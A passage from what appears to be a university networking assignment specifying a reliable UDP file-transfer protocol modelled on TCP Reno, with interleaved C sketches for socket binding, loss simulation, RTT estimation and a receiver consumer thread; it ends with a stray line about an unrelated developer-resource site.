Maximum sending sliding-window size (in datagram units). You will not be handing in your server.in file. We shall create our own when we come to test your code. So it is important that you stick strictly to the file name and content conventions specified above. The same applies to the client.in input file below. Arguments for the client The client is to be provided with an input file client.in from which it reads the following information, in the order shown, one item per line : IP address of server (not the hostname). Well-known port number of server. Filename to be transferred. Receiving sliding-window size (in datagram units). Random generator seed value. Probability p of datagram loss. This should be a real number in the range [ 0.0 , 1.0 ] (value 0.0 means no loss occurs; value 1.0 means all datagrams are lost). The mean µ, in milliseconds, for an exponential distribution controlling the rate at which the client reads received datagram payloads from its receive buffer. Operation Server starts up and reads its arguments from file server.in. As we shall see, when a client communicates with the server, the server will want to know what IP address that client is using to identify the server (i.e., the destination IP address in the incoming datagram). Normally, this can be done relatively straightforwardly using the IP_RECVDESTADDR socket option, and picking up the information using the ancillary data (‘control information’) capability of the recvmsg function. Unfortunately, Solaris 2.10 does not support the IP_RECVDESTADDR option (nor, incidentally, does it support the msg_flags option in msghdr - see p.390). This considerably complicates things. In the absence of IP_RECVDESTADDR, what the server has to do as part of its initialization phase is to bind each IP address it has (and, simultaneously, its well-known port number, which it has read in from server.in) to a separate UDP socket. The code in Section 22.6, which uses the get_ifi_info function, shows you how to do that. However, there are important differences between that code and the version you want to implement. The code of Section 22.6 binds the IP addresses and forks off a child for each address that is bound to. We do not want to do that. Instead you should have an array of socket descriptors. For each IP address, create a new socket and bind the address (and well-known port number) to the socket without forking off child processes. Creating child processes comes later, when clients arrive. The code of Section 22.6 also attempts to bind broadcast addresses. We do not want to do this. It binds a wildcard IP address, which we certainly do not want to do either. We should bind strictly only unicast addresses (including the loopback address). The get_ifi_info function (which the code in Section 22.6 uses) has to be modified so that it also gets the network masks for the IP addresses of the node, and adds these to the information stored in the linked list of ifi_info structures (see Figure 17.5, p.471) it produces.
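To make the no-fork binding step concrete, here is a minimal sketch, assuming the unicast addresses (loopback included) have already been collected from the modified get_ifi_info traversal; the address list, port number, and function names below are illustrative placeholders, not the assignment's required interface:

```c
/* Sketch: bind the server's well-known port to a separate UDP socket
 * for each unicast IPv4 address -- no fork, no broadcast, no wildcard. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/socket.h>

static int bind_one(const char *ip, int port)
{
    struct sockaddr_in sa;
    int fd = socket(AF_INET, SOCK_DGRAM, 0);
    if (fd < 0) { perror("socket"); exit(1); }

    memset(&sa, 0, sizeof(sa));
    sa.sin_family = AF_INET;
    sa.sin_port   = htons(port);
    if (inet_pton(AF_INET, ip, &sa.sin_addr) != 1) {
        fprintf(stderr, "bad address %s\n", ip);
        exit(1);
    }
    if (bind(fd, (struct sockaddr *)&sa, sizeof(sa)) < 0) {
        perror("bind");
        exit(1);
    }
    return fd;
}

int main(void)
{
    /* placeholder list; the real server walks the ifi_info list that
     * the modified get_ifi_info() returns, one entry per interface */
    const char *addrs[] = { "127.0.0.1" };
    int nfds = sizeof(addrs) / sizeof(addrs[0]);
    int fds[8];

    for (int i = 0; i < nfds; i++) {
        fds[i] = bind_one(addrs[i], 9877);      /* 9877: placeholder port */
        printf("bound %s:9877 on fd %d\n", addrs[i], fds[i]);
    }
    for (int i = 0; i < nfds; i++)
        close(fds[i]);
    return 0;
}
```

Note that no child is forked here and no wildcard or broadcast address is bound; children come later, one per arriving client.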
As you go binding each IP address to a distinct socket, it will be useful for later processing to build your own array of structures, where a structure element records the following information for each socket : sockfd IP address bound to the socket network mask for the IP address subnet address (obtained by doing a bit-wise and between the IP address and its network mask) Report, in a ReadMe file which you hand in with your code, on the modifications you had to introduce to ensure that only unicast addresses are bound, and on your implementation of the array of structures described above. You should print out on stdout, with an appropriate message and appropriately formatted in dotted decimal notation, the IP address, network mask, and subnet address for each socket in your array of structures (you do not need to print the sockfd). The server now uses select to monitor the sockets it has created for incoming datagrams. When it returns from select, it must use recvfrom or recvmsg to read the incoming datagram (see 6. below). When a client starts, it first reads its arguments from the file client.in. The client checks if the server host is ‘local’ to its (extended) Ethernet. If so, all its communication to the server is to occur as MSG_DONTROUTE (or SO_DONTROUTE socket option). It determines if the server host is ‘local’ as follows. The first thing the client should do is to use the modified get_ifi_info function to obtain all of its IP addresses and associated network masks. Print out on stdout, in dotted decimal notation and with an appropriate message, the IP addresses and network masks obtained. In the following, IPserver designates the IP address the client will use to identify the server, and IPclient designates the IP address the client will choose to identify itself. The client checks whether the server is on the same host. If so, it should use the loopback address 127.0.0.1 for the server (i.e. , IPserver = 127.0.0.1). IPclient should also be set to the loopback address. Otherwise it proceeds as follows: IPserver is set to the IP address for the server in the client.in file. Given IPserver and the (unicast) IP addresses and network masks for the client returned by get_ifi_info in the linked list of ifi_info structures, you should be able to figure out if the server node is ‘local’ or not. This will be discussed in class; but let me just remind you here that you should use ‘longest prefix matching’ where applicable. If there are multiple client addresses, and the server host is ‘local’, the client chooses an IP address for itself, IPclient, which matches up as ‘local’ according to your examination above. If the server host is not ‘local’, then IPclient can be chosen arbitrarily. Print out on stdout the results of your examination, as to whether the server host is ‘local’ or not, as well as the IPclient and IPserver addresses selected. Note that this manner of determining whether the server is local or not is somewhat clumsy and ‘over-engineered’, and, as such, should be viewed more in the nature of a pedagogical exercise. Ideally, we would like to look up the server IP address(es) in the routing table (see Section 18.3). This requires that a routing socket be created, for which we need superuser privilege. Alternatively, we might want to dump out the routing table, using the sysctl function for example (see Section 18.4), and examine it directly. Unfortunately, Solaris 2.10 does not support sysctl. 
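To pin down the bookkeeping described above, here is a minimal sketch of the per-socket array of structures together with one way to phrase the longest-prefix-match ‘local’ test; the struct layout and names are my own illustration, not a prescribed interface:

```c
/* Sketch: one entry per bound socket, recording the address, mask,
 * and precomputed subnet; 'local' = peer matches some entry's subnet,
 * preferring the longest (numerically largest) mask. */
#include <stdio.h>
#include <stdint.h>
#include <arpa/inet.h>
#include <netinet/in.h>

struct sock_info {
    int            sockfd;
    struct in_addr addr;     /* IP address bound to the socket */
    struct in_addr mask;     /* network mask for that address  */
    struct in_addr subnet;   /* addr & mask, filled in below   */
};

static void fill_subnet(struct sock_info *si)
{
    /* subnet address = bitwise AND of address and mask */
    si->subnet.s_addr = si->addr.s_addr & si->mask.s_addr;
}

/* Return the matching entry's index (longest prefix wins), or -1. */
static int match_local(const struct sock_info *tab, int n, struct in_addr peer)
{
    int best = -1;
    uint32_t best_mask = 0;

    for (int i = 0; i < n; i++) {
        uint32_t m = ntohl(tab[i].mask.s_addr);
        if ((peer.s_addr & tab[i].mask.s_addr) == tab[i].subnet.s_addr
            && m >= best_mask) {
            best = i;
            best_mask = m;
        }
    }
    return best;
}

int main(void)
{
    struct sock_info si = { .sockfd = 3 };      /* fd value illustrative */
    struct in_addr peer;

    inet_pton(AF_INET, "130.245.1.100", &si.addr);
    inet_pton(AF_INET, "255.255.255.0", &si.mask);
    fill_subnet(&si);

    inet_pton(AF_INET, "130.245.1.42", &peer);
    printf("peer is %s\n",
           match_local(&si, 1, peer) >= 0 ? "local" : "not local");
    return 0;
}
```

When two entries both match, the one with the longer mask (say a /28 over a /24) wins, which is exactly the ‘longest prefix matching’ the assignment asks for.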
Note also that there is a slight problem with the address 130.245.1.123/24 assigned to compserv3 (see rightmost column of file hosts, and note that this particular compserv3 address “overlaps” with the 130.245.1.x/28 addresses in that same column assigned to compserv1, compserv2 & compserv4). In particular, if the client is running on compserv3 and the server on any of the other three compservs, and if that server node is also being identified to the client by its /28 (rather than its /24) address, then the client will get a “false positive” when it tests as to whether the server node is local or not. In other words, the client will deem the server node to be local, whereas in fact it should not be considered local. Because of this, it is perhaps best simply not to use compserv3 to run the client (but it is o.k. to use it to run the server). Finally, using MSG_DONTROUTE where possible would seem to gain us efficiency, inasmuch as the kernel does not need to consult the routing table for every datagram sent. But, in fact, that is not so. Recall that one effect of connect with UDP sockets is that routing information is obtained by the kernel at the time the connect is issued. That information is cached and used for subsequent sends from the connected socket (see p.255). The client now creates a UDP socket and calls bind on IPclient, with 0 as the port number. This will cause the kernel to bind an ephemeral port to the socket. After the bind, use the getsockname function (Section 4.10) to obtain IPclient and the ephemeral port number that has been assigned to the socket, and print that information out on stdout, with an appropriate message and appropriately formatted. The client connects its socket to IPserver and the well-known port number of the server. After the connect, use the getpeername function (Section 4.10) to obtain IPserver and the well-known port number of the server, and print that information out on stdout, with an appropriate message and appropriately formatted. The client sends a datagram to the server giving the filename for the transfer. This send needs to be backed up by a timeout in case the datagram is lost. Note that the incoming datagram from the client will be delivered to the server at the socket to which the destination IP address that the datagram is carrying has been bound. Thus, the server can obtain that address (it is, of course, IPserver) and thereby achieve what IP_RECVDESTADDR would have given us had it been available. Furthermore, the server process can obtain the IP address (this will, of course, be IPclient) and ephemeral port number of the client through the recvfrom or recvmsg functions. The server forks off a child process to handle the client. The server parent process goes back to the select to listen for new clients. Hereafter, and unless otherwise stated, whenever we refer to the ‘server’, we mean the server child process handling the client’s file transfer, not the server parent process. Typically, the first thing the server child would be expected to do is to close all sockets it ‘inherits’ from its parent. However, this is not the case with us. The server child does indeed close the sockets it inherited, but not the socket on which the client request arrived. It leaves that socket open for now. Call this socket the ‘listening’ socket. The server (child) then checks if the client host is local to its (extended) Ethernet. If so, all its communication to the client is to occur as MSG_DONTROUTE (or SO_DONTROUTE socket option).
If IPserver (obtained in 5. above) is the loopback address, then we are done. Otherwise, the server has to proceed with the following step. Use the array of structures you built in 1. above, together with the addresses IPserver and IPclient to determine if the client is ‘local’. Print out on stdout the results of your examination, as to whether the client host is ‘local’ or not. The server (child) creates a UDP socket to handle file transfer to the client. Call this socket the ‘connection’ socket. It binds the socket to IPserver, with port number 0 so that its kernel assigns an ephemeral port. After the bind, use the getsockname function (Section 4.10) to obtain IPserver and the ephemeral port number that has been assigned to the socket, and print that information out on stdout, with an appropriate message and appropriately formatted. The server then connects this ‘connection’ socket to the client’s IPclient and ephemeral port number. The server now sends the client a datagram, in which it passes it the ephemeral port number of its ‘connection’ socket as the data payload of the datagram. This datagram is sent using the ‘listening’ socket inherited from its parent, otherwise the client (whose socket is connected to the server’s ‘listening’ socket at the latter’s well-known port number) will reject it. This datagram must be backed up by the ARQ mechanism, and retransmitted in the event of loss. Note that if this datagram is indeed lost, the client might well time out and retransmit its original request message (the one carrying the file name). In this event, you must somehow ensure that the parent server does not mistake this retransmitted request for a new client coming in, and spawn off yet another child to handle it. How do you do that? It is potentially more involved than it might seem. I will be discussing this in class, as well as ‘race’ conditions that could potentially arise, depending on how you code the mechanisms I present. When the client receives the datagram carrying the ephemeral port number of the server’s ‘connection’ socket, it reconnects its socket to the server’s ‘connection’ socket, using IPserver and the ephemeral port number received in the datagram (see p.254). It now uses this reconnected socket to send the server an acknowledgment. Note that this implies that, in the event of the server timing out, it should retransmit two copies of its ‘ephemeral port number’ message, one on its ‘listening’ socket and the other on its ‘connection’ socket (why?). When the server receives the acknowledgment, it closes the ‘listening’ socket it inherited from its parent. The server can now commence the file transfer through its ‘connection’ socket. The net effect of all these binds and connects at server and client is that no ‘outsider’ UDP datagram (broadcast, multicast, unicast - fortuitously or maliciously) can now intrude on the communication between server and client. Starting with the first datagram sent out, the client behaves as follows. Whenever a datagram arrives, or an ACK is about to be sent out (or, indeed, the initial datagram to the server giving the filename for the transfer), the client uses some random number generator function random() (initialized by the client.in argument value seed) to decide with probability p (another client.in argument value) if the datagram or ACK should be discarded by way of simulating transmission loss across the network. (I will briefly discuss in class how you do this.) 
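One way to structure the loss simulation just described, as a sketch; the normalization constant reflects random()'s documented 0 to 2^31 - 1 range, and the seed and p values in the demo are placeholders for the client.in arguments:

```c
/* Sketch: with probability p, report that a datagram or ACK should
 * be silently discarded.  Every client send/receive path would call
 * should_drop() before actually processing the datagram. */
#include <stdio.h>
#include <stdlib.h>

static double drop_prob;                    /* p from client.in    */

static void loss_init(unsigned int seed, double p)
{
    srandom(seed);                          /* seed from client.in */
    drop_prob = p;
}

/* Return 1 if this datagram/ACK should be dropped. */
static int should_drop(void)
{
    double u = random() / 2147483648.0;     /* uniform over [0,1)  */
    return u < drop_prob;
}

int main(void)
{
    int dropped = 0;

    loss_init(12345, 0.3);                  /* placeholder values  */
    for (int i = 0; i < 100000; i++)
        dropped += should_drop();
    printf("dropped %d of 100000 (expect roughly 30000)\n", dropped);
    return 0;
}
```

With p = 0.0 nothing is ever dropped, and with p = 1.0 everything is, matching the client.in semantics above.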
Adding reliability to UDP The mechanisms you are to implement are based on TCP Reno. These include : Reliable data transmission using ARQ sliding-windows, with Fast Retransmit. Flow control via receiver window advertisements. Congestion control that implements : Slow Start Congestion Avoidance (‘Additive-Increase/Multiplicative Decrease’ – AIMD) Fast Recovery (but without the window-inflation aspect of Fast Recovery) Only some, and by no means all, of the details for these are covered below. The rest will be presented in class, especially those concerning flow control and TCP Reno’s congestion control mechanisms in general : Slow Start, Congestion Avoidance, Fast Retransmit and Fast Recovery. Implement a timeout mechanism on the sender (server) side. This is available to you from Stevens, Section 22.5. Note, however, that you will need to modify the basic driving mechanism of Figure 22.7 appropriately since the situation at the sender side is not a repetitive cycle of send-receive, but rather a straightforward progression of send-send-send- . . . Also, modify the RTT and RTO mechanisms of Section 22.5 as specified below. I will be discussing the details of these modifications and the reasons for them in class. Modify function rtt_stop (Fig. 22.13) so that it uses integer arithmetic rather than floating point. This will entail your also having to modify some of the variable and function parameter declarations throughout Section 22.5 from float to int, as appropriate. In the unprtt.h header file (Fig. 22.10) set : RTT_RXTMIN to 1000 msec. (1 sec. instead of the current value 3 sec.) RTT_RXTMAX to 3000 msec. (3 sec. instead of the current value 60 sec.) RTT_MAXNREXMT to 12 (instead of the current value 3) In function rtt_timeout (Fig. 22.14), after doubling the RTO in line 86, pass its value through the function rtt_minmax of Fig. 22.11 (somewhat along the lines of what is done in line 77 of rtt_stop, Fig. 22.13). Finally, note that with the modification to integer calculation of the smoothed RTT and its variation, and given the small RTT values you will experience on the cs / sbpub network, these calculations should probably now be done on a millisecond or even microsecond scale (rather than in seconds, as is the case with Stevens’ code). Otherwise, small measured RTTs could show up as 0 on a scale of seconds, yielding a negative result when we subtract the smoothed RTT from the measured RTT (line 72 of rtt_stop, Fig. 22.13). Report the details of your modifications to the code of Section 22.5 in the ReadMe file which you hand in with your code. We need to have a sender sliding window mechanism for the retransmission of lost datagrams; and a receiver sliding window in order to ensure correct sequencing of received file contents, and some measure of flow control. You should implement something based on TCP Reno’s mechanisms, with cumulative acknowledgments, receiver window advertisements, and a congestion control mechanism I will explain in detail in class. For a reference on TCP’s mechanisms generally, see W. Richard Stevens, TCP/IP Illustrated, Volume 1, especially Sections 20.2 - 20.4 of Chapter 20, and Sections 21.1 - 21.8 of Chapter 21. Bear in mind that our sequence numbers should count datagrams, not bytes as in TCP. Remember that the sender and receiver window sizes have to be set according to the argument values in client.in and server.in, respectively.
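Returning to the integer-arithmetic RTT modifications above: the usual trick is to store the smoothed RTT scaled by 8 and the variation scaled by 4, so every division becomes a shift. Below is a minimal sketch on a millisecond scale with the modified clamping values; it mirrors the structure of the Section 22.5 code but is an illustration, not Stevens' code verbatim:

```c
/* Sketch: integer (millisecond) RTT smoothing and RTO backoff.
 * srtt8 holds 8 * SRTT and rttvar4 holds 4 * RTTVAR, both in ms. */
#include <stdio.h>

#define RTT_RXTMIN 1000      /* min RTO, ms (modified value) */
#define RTT_RXTMAX 3000      /* max RTO, ms (modified value) */

static int srtt8;            /* 8 * smoothed RTT             */
static int rttvar4;          /* 4 * RTT variation            */
static int rto;              /* current RTO, ms              */

static int rtt_minmax_ms(int t)
{
    if (t < RTT_RXTMIN) return RTT_RXTMIN;
    if (t > RTT_RXTMAX) return RTT_RXTMAX;
    return t;
}

/* Feed one measured RTT (ms) into the estimator; recompute RTO. */
static void rtt_stop_ms(int measured)
{
    int delta = measured - (srtt8 >> 3);    /* measured - SRTT          */
    srtt8 += delta;                         /* SRTT += delta/8, scaled  */
    if (delta < 0)
        delta = -delta;
    rttvar4 += delta - (rttvar4 >> 2);      /* RTTVAR += (|d|-RTTVAR)/4 */
    rto = rtt_minmax_ms((srtt8 >> 3) + rttvar4);  /* SRTT + 4*RTTVAR    */
}

/* On timeout: double the RTO, then clamp it, as the assignment asks. */
static void rtt_timeout_ms(void)
{
    rto = rtt_minmax_ms(rto * 2);
}

int main(void)
{
    int samples[] = { 40, 55, 35, 60, 45 }; /* illustrative RTTs, ms */

    for (int i = 0; i < 5; i++) {
        rtt_stop_ms(samples[i]);
        printf("rtt=%d ms -> rto=%d ms\n", samples[i], rto);
    }
    rtt_timeout_ms();
    printf("after a timeout -> rto=%d ms\n", rto);
    return 0;
}
```

Because everything is in integer milliseconds, a small LAN RTT no longer rounds to 0 the way it would on a scale of seconds, which is precisely the negative-subtraction pitfall noted above.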
Whenever the sender window becomes full and so ‘locks’, the server should print out a message to that effect on stdout. Similarly, whenever the receiver window ‘locks’, the client should print out a message on stdout. Be aware of the potential for deadlock when the receiver window ‘locks’. This situation is handled by having the receiver process send a duplicate ACK which acts as a window update when its window opens again (see Figure 20.3 and the discussion about it in TCP/IP Illustrated). However, this is not enough, because ACKs are not backed up by a timeout mechanism in the event they are lost. So we will also need to implement a persist timer driving window probes in the sender process (see Sections 22.1 & 22.2 in Chapter 22 of TCP/IP Illustrated). Note that you do not have to worry about the Silly Window Syndrome discussed in Section 22.3 of TCP/IP Illustrated since the receiver process consumes ‘full sized’ 512-byte messages from the receiver buffer (see 3. below). Report on the details of the ARQ mechanism you implemented in the ReadMe file you hand in. Indeed, you should report on all the TCP mechanisms you implemented in the ReadMe file, both the ones discussed here, and the ones I will be discussing in class. Make your datagram payload a fixed 512 bytes, inclusive of the file transfer protocol header (which must, at the very least, carry: the sequence number of the datagram; ACKs; and advertised window notifications). The client reads the file contents from its receive buffer and prints them out on stdout using a separate thread. This thread sits in a repetitive loop till all the file contents have been printed out, doing the following. It samples from an exponential distribution with mean µ milliseconds (read from the client.in file), sleeps for that number of milliseconds; wakes up to read and print all in-order file contents available in the receive buffer at that point; samples again from the exponential distribution; sleeps; and so on. The formula -1 × µ × ln( random() ), where ln is the natural logarithm, yields variates from an exponential distribution with mean µ, based on the uniformly-distributed variates over ( 0 , 1 ) returned by random(). Note that you will need to implement some sort of mutual exclusion/semaphore mechanism on the client side so that the thread that sleeps and wakes up to consume from the receive buffer is not updating the state variables of the buffer at the same time as the main thread reading from the socket and depositing into the buffer is doing the same. Furthermore, we need to ensure that the main thread does not effectively monopolize the semaphore, and thus lock out the sleeping thread for prolonged periods when it wakes up. See the textbook, Section 26.7, ‘Mutexes: Mutual Exclusion’, pp.697-701. You might also find Section 26.8, ‘Condition Variables’, pp.701-705, useful. (A sketch of this consumer thread appears below.) You will need to devise some way by which the sender can notify the receiver when it has sent the last datagram of the file transfer, without the receiver mistaking that EOF marker as part of the file contents. (Also, note that the last data segment could be a “short” segment of less than 512 bytes – your client needs to be able to handle this correctly somehow.) When the sender receives an ACK for the last datagram of the transfer, the (child) server terminates. The parent server has to take care of cleaning up zombie children. Note that if we want a clean closing, the client process cannot simply terminate when the receiver ACKs the last datagram.
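Before turning to connection close, here is the promised sketch of the consumer thread: it samples -1 × µ × ln( random() ) for its sleep interval, then drains the in-order buffer contents under a mutex. The buffer itself is stubbed out, and the mean and seed values are placeholders for the client.in arguments:

```c
/* Sketch: consumer thread that sleeps for an exponentially
 * distributed interval (mean mu ms), then drains the receive
 * buffer under a mutex shared with the socket-reading thread.
 * Compile with -lpthread -lm. */
#include <math.h>
#include <pthread.h>
#include <stdio.h>
#include <stdlib.h>
#include <time.h>
#include <unistd.h>

static pthread_mutex_t buf_lock = PTHREAD_MUTEX_INITIALIZER;
static int transfer_done;        /* set by the main (socket) thread */

/* -1 * mu * ln(u), u uniform over (0,1]; the +1 avoids ln(0) */
static double exp_ms(double mu)
{
    double u = (random() + 1.0) / 2147483649.0;
    return -1.0 * mu * log(u);
}

static void sleep_ms(double ms)
{
    struct timespec ts;
    ts.tv_sec  = (time_t)(ms / 1000.0);
    ts.tv_nsec = (long)((ms - ts.tv_sec * 1000.0) * 1e6);
    nanosleep(&ts, NULL);
}

/* Stub: the real version prints, and removes, all in-order file
 * contents currently sitting in the receiver sliding window. */
static void drain_buffer(void) { }

static void *consumer(void *arg)
{
    double mu = *(double *)arg;

    for (;;) {
        sleep_ms(exp_ms(mu));
        pthread_mutex_lock(&buf_lock);
        drain_buffer();
        int done = transfer_done;
        pthread_mutex_unlock(&buf_lock);
        if (done)
            break;
    }
    return NULL;
}

int main(void)
{
    pthread_t tid;
    double mu = 100.0;           /* placeholder mean from client.in */

    srandom(1);                  /* placeholder seed from client.in */
    pthread_create(&tid, NULL, consumer, &mu);
    sleep(1);                    /* stand-in for the file transfer  */
    pthread_mutex_lock(&buf_lock);
    transfer_done = 1;
    pthread_mutex_unlock(&buf_lock);
    pthread_join(tid, NULL);
    return 0;
}
```

The real drain_buffer() is also where a previously ‘locked’ receiver window would reopen, triggering the window-update ACK discussed above.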
Returning to the clean close: that last ACK could be lost, which would leave the (child) server process ‘hanging’, timing out, and retransmitting the last datagram. TCP attempts to deal with this problem by means of the TIME_WAIT state. You should have your receiver process behave similarly, sticking around in something akin to a TIME_WAIT state in case it needs to retransmit the ACK. In the ReadMe file you hand in, report on how you dealt with the issues raised here: sender notifying receiver of the last datagram, clean closing, and so on. Output Some of the output required from your program has been described in the section Operation above. I expect you to provide further output – clear, well-structured, well-laid-out, concise but sufficient and helpful – in the client and server windows by means of which we can trace the correct evolution of your TCP’s behaviour in all its intricacies : information (e.g., sequence number) on datagrams and ACKs sent and dropped, window advertisements, datagram retransmissions (and why : dup ACKs or RTO); entering/exiting Slow Start and Congestion Avoidance, ssthresh and cwnd values; sender and receiver windows locking/unlocking; etc., etc. The onus is on you to convince us that the TCP mechanisms you implemented are working correctly. Too many students do not put sufficient thought, creative imagination, time or effort into this. It is neither the TA’s nor my responsibility to sit staring at an essentially blank screen, trying to summon up our paranormal psychology skills to figure out if your TCP implementation is really working correctly in all its very intricate aspects, simply because the transferred file seems to be printing o.k. in the client window. Nor is it our responsibility to strain our eyes and our patience wading through a mountain of obscure, ill-structured, hyper-messy, debugging-style output because, for example, your effort-conserving concept of what is ‘suitable’ is to dump your debugging output on us, relevant, irrelevant, and everything in between.
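And to close out the clean-close discussion: one possible shape for the receiver's TIME_WAIT-style linger, as a sketch; the linger duration, names, and framing are illustrative assumptions, not a prescribed design:

```c
/* Sketch: after ACKing the final datagram, linger instead of exiting.
 * If the sender retransmits its last datagram, our final ACK was
 * lost, so re-ACK it; if the timer expires quietly, exit cleanly. */
#include <stdio.h>
#include <sys/select.h>
#include <sys/socket.h>

#define LINGER_SEC 12   /* illustrative; tie this to your RTO bounds */

void time_wait_linger(int connfd, const void *final_ack, size_t acklen)
{
    char junk[512];
    fd_set rset;

    for (;;) {
        struct timeval tv = { LINGER_SEC, 0 };
        FD_ZERO(&rset);
        FD_SET(connfd, &rset);
        if (select(connfd + 1, &rset, NULL, NULL, &tv) <= 0)
            break;               /* timer expired (or error): done   */
        recv(connfd, junk, sizeof(junk), 0);   /* consume retransmit */
        send(connfd, final_ack, acklen, 0);    /* re-send final ACK  */
        printf("re-ACKed retransmitted final datagram\n");
    }
}
```

Each retransmission restarts the full linger timer here, which errs on the safe side.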
andriksantos / KeeboxWelcome to KEEBOX LIST™, a carefully curated collection of essential resources for developers. This site is designed to be your centralized reference point, helping you quickly find tools, libraries, and guides relevant to your work.